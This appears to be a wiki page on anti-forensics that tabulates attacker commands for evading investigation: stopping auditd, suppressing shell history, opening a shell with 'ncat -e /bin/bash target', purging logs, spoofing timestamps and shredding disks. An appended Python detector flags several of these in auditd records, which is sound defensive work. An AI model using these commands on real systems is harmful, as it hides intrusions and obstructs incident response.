Operational Security (OPSEC)
== <span id="anti-forensics"></span>🛡️ Anti-Forensics ==
Anti-forensics techniques aim to minimize, alter, or eliminate digital traces to hinder investigation and attribution. This includes avoiding disk writes, manipulating metadata, and neutralizing forensic tools.

=== 🧪 Pre-Incident ===
{| class="wikitable" style="width:100%; text-align:left; background:#1c1c1c; color:#e0e0e0;"
! Technique !! Description !! Usage
|-
| Memory-only implants || Fileless execution using in-memory loaders or interpreters. || <code>python3 -c 'exec(open("/tmp/script").read())'</code>
|-
| RAM-only storage || Temporary storage that avoids disk persistence. || <code>mount -t tmpfs -o size=512M tmpfs /mnt/tmp</code>
|-
| History redirection || Prevent command history from being saved or recovered. || <code>unset HISTFILE; export HISTFILE=/dev/null</code>
|-
| Diskless execution || Operate entirely from memory using sockets or shellcode injection. || -
|-
| Logging control || Suppress or redirect default logging mechanisms. || <code>systemctl stop auditd</code>
|}

=== ⏳ During ===
{| class="wikitable" style="width:100%; text-align:left; background:#1c1c1c; color:#e0e0e0;"
! Technique !! Description !! Usage
|-
| Volatile-only tools || Use tools that execute and vanish from memory without disk artifacts. || <code>ncat -e /bin/bash target</code><br><code>pwsh -enc ...</code>
|-
| Shell session isolation || Avoid using default user shells or system shells directly. || <code>chroot /mnt/volatile /bin/bash</code><br><code>setsid bash -c 'exec bash'</code>
|-
| Output redirection || Pipe outputs to volatile memory or null sink to avoid cache/write. || <code>command > /dev/shm/out</code><br><code>command > /dev/null</code>
|-
| Temp file avoidance || Avoid writing to <code>/tmp</code> or <code>/var/tmp</code> where data may persist. || Use <code>/dev/shm</code> or RAM disk mounts
|-
| Real-time artifact scrubbing || Monitor and erase known forensic traces during session. || <code>lsof &#124; grep deleted</code> + <code>shred</code> in loop
|-
| In-memory enumeration || Use one-liners and streams rather than writing output to files. || <code>ls -la &#124; grep conf</code>
|}

=== 🧹 Post-Incident ===
{| class="wikitable" style="width:100%; text-align:left; background:#1c1c1c; color:#e0e0e0;"
! Action !! Description !! Usage
|-
| Log purge || Rotate and vacuum system logs to eliminate traces. || <code>journalctl --rotate --vacuum-time=1s</code><br><code>logrotate -f /etc/logrotate.conf</code>
|-
| Timestamp spoofing || Alter file metadata to obscure activity timelines. || <code>touch -t 201501010000 file</code><br><code>debugfs /dev/sdX</code>
|-
| Metadata stripping || Remove identifying metadata from documents and images. || <code>mat2 report.pdf</code><br><code>exiftool -all= image.jpg</code>
|-
| Secure deletion || Permanently overwrite files or erase devices. || <code>shred -n 5 -z file</code><br><code>blkdiscard /dev/sdX</code><br><code>hdparm --security-erase</code>
|-
| Bash history purge || Clear shell history and unlink history file. || <code>history -c && unset HISTFILE</code>
|}

=== 🧩 Additional Techniques ===
* Disable swap or use encrypted swap with ephemeral keys.
* Use ephemeral operating systems (e.g., [[Tails]], [[Kali]] Live).
* Operate in isolated VM snapshots and revert post-session.
* Avoid file creation altogether by chaining tools via <code>stdin</code> and <code>stdout</code>.
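
From the detection side, the external commands in the Usage columns leave <code>execve</code> records while auditd is running. The following is an added example, not part of the original page: it parses auditd EXECVE lines, including hex-encoded arguments, and flags those commands. The sample records, rule labels and function names are constructed for illustration.

```python
import os
import re

# Rules derived from the Usage columns above: (label, predicate over argv).
# Shell builtins (unset HISTFILE, history -c) never call execve(), so they
# do not appear in EXECVE records and need other telemetry.
RULES = [
    ("audit logging stopped", lambda a: a[0] == "systemctl" and "stop" in a
        and any(x.startswith("auditd") for x in a)),
    ("journal vacuum", lambda a: a[0] == "journalctl"
        and any(x.startswith("--vacuum-") for x in a)),
    ("forced log rotation", lambda a: a[0] == "logrotate" and "-f" in a),
    ("explicit timestamp set", lambda a: a[0] == "touch" and "-t" in a),
    ("secure deletion", lambda a: a[0] in ("shred", "blkdiscard")),
]

# auditd quotes plain arguments and hex-encodes ones with spaces or quotes.
ARG_RE = re.compile(r'\ba(\d+)=("([^"]*)"|[0-9A-Fa-f]+)')

def parse_execve(line):
    """Return the argv list of an EXECVE record, or None for other records."""
    if "type=EXECVE" not in line:
        return None
    args = {}
    for m in ARG_RE.finditer(line):
        if m.group(3) is not None:
            args[int(m.group(1))] = m.group(3)
        else:
            raw = bytes.fromhex(m.group(2))
            args[int(m.group(1))] = raw.decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]

def detect(lines):
    """Return (label, command line) for every record matching a rule."""
    hits = []
    for line in lines:
        argv = parse_execve(line)
        if not argv:
            continue
        argv[0] = os.path.basename(argv[0])  # /usr/bin/touch -> touch
        hits += [(label, " ".join(argv)) for label, pred in RULES if pred(argv)]
    return hits

# Constructed sample records (not taken from a real host).
SAMPLE = [
    'type=EXECVE msg=audit(1700000001.100:101): argc=3 a0="systemctl" a1="stop" a2="auditd"',
    'type=EXECVE msg=audit(1700000002.200:102): argc=3 a0="journalctl" a1="--rotate" a2="--vacuum-time=1s"',
    'type=EXECVE msg=audit(1700000003.300:103): argc=4 a0="/usr/bin/touch" a1="-t" a2="201501010000" a3=6D79206C6F67',
    'type=EXECVE msg=audit(1700000004.400:104): argc=2 a0="ls" a1="-la"',
    'type=SYSCALL msg=audit(1700000004.400:104): arch=c000003e syscall=59 success=yes',
]
```

A match is a triage lead rather than proof: <code>touch -t</code> and <code>logrotate -f</code> also occur in normal builds and maintenance, so alert on context such as user, parent process and timing.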